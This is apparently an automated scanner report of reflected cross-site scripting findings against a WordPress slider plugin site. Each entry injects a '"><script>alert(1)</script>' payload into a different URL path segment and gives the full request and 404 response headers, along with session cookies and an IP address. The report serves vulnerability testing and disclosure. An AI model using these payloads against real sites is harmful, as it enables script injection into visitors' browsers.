The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b3d1"><script>alert(1)</script>c6b5086f849 was submitted in the REST URL parameter 6. This input was echoed as 8b3d1\"><script>alert(1)</script>c6b5086f849 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/js/zoomer.js8b3d1"><script>alert(1)</script>c6b5086f849 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674546; expires=Thu, 02-Feb-2012 19:22:26 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:26 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90df"><script>alert(1)</script>fc5f82eb8e was submitted in the REST URL parameter 1. This input was echoed as d90df\"><script>alert(1)</script>fc5f82eb8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited90df"><script>alert(1)</script>fc5f82eb8e/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d7f2"><script>alert(1)</script>072b6ccaa59 was submitted in the REST URL parameter 2. This input was echoed as 1d7f2\"><script>alert(1)</script>072b6ccaa59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content1d7f2"><script>alert(1)</script>072b6ccaa59/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:23 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb38d"><script>alert(1)</script>3a5d2ee8686 was submitted in the REST URL parameter 3. This input was echoed as fb38d\"><script>alert(1)</script>3a5d2ee8686 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsfb38d"><script>alert(1)</script>3a5d2ee8686/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b392f"><script>alert(1)</script>ed6e8acd146 was submitted in the REST URL parameter 4. This input was echoed as b392f\"><script>alert(1)</script>ed6e8acd146 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/supersliderb392f"><script>alert(1)</script>ed6e8acd146/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:26 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ed6"><script>alert(1)</script>d2c6d4601bc was submitted in the REST URL parameter 5. This input was echoed as 35ed6\"><script>alert(1)</script>d2c6d4601bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data35ed6"><script>alert(1)</script>d2c6d4601bc/superslider/ssBase/default/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:29 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674549+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674550; expires=Thu, 02-Feb-2012 19:22:30 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:30 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53424
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55124"><script>alert(1)</script>66807ffcd49 was submitted in the REST URL parameter 6. This input was echoed as 55124\"><script>alert(1)</script>66807ffcd49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider55124"><script>alert(1)</script>66807ffcd49/ssBase/default/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674552; expires=Thu, 02-Feb-2012 19:22:32 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:32 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7371b"><script>alert(1)</script>e47164d461b was submitted in the REST URL parameter 7. This input was echoed as 7371b\"><script>alert(1)</script>e47164d461b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7371b"><script>alert(1)</script>e47164d461b/default/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:33 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674553+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b76a"><script>alert(1)</script>669576129ba was submitted in the REST URL parameter 8. This input was echoed as 7b76a\"><script>alert(1)</script>669576129ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7b76a"><script>alert(1)</script>669576129ba/scroll.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:35 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674555+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2288a"><script>alert(1)</script>db427e6a945 was submitted in the REST URL parameter 9. This input was echoed as 2288a\"><script>alert(1)</script>db427e6a945 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css2288a"><script>alert(1)</script>db427e6a945 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:36 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674556+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1daa"><script>alert(1)</script>94f5a7e073c was submitted in the REST URL parameter 1. This input was echoed as d1daa\"><script>alert(1)</script>94f5a7e073c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited1daa"><script>alert(1)</script>94f5a7e073c/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:14 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674534+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674534; expires=Thu, 02-Feb-2012 19:22:14 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c82"><script>alert(1)</script>75b240e8597 was submitted in the REST URL parameter 2. This input was echoed as b7c82\"><script>alert(1)</script>75b240e8597 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb7c82"><script>alert(1)</script>75b240e8597/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:15 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674535+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674536; expires=Thu, 02-Feb-2012 19:22:16 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:16 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4723e"><script>alert(1)</script>03783ed291a was submitted in the REST URL parameter 3. This input was echoed as 4723e\"><script>alert(1)</script>03783ed291a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins4723e"><script>alert(1)</script>03783ed291a/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:17 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674537+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674537; expires=Thu, 02-Feb-2012 19:22:17 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73db0"><script>alert(1)</script>62b356dcb5e was submitted in the REST URL parameter 4. This input was echoed as 73db0\"><script>alert(1)</script>62b356dcb5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider73db0"><script>alert(1)</script>62b356dcb5e/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5241"><script>alert(1)</script>51d25023ca8 was submitted in the REST URL parameter 5. This input was echoed as d5241\"><script>alert(1)</script>51d25023ca8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-datad5241"><script>alert(1)</script>51d25023ca8/superslider/ssBase/default/tooltips.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
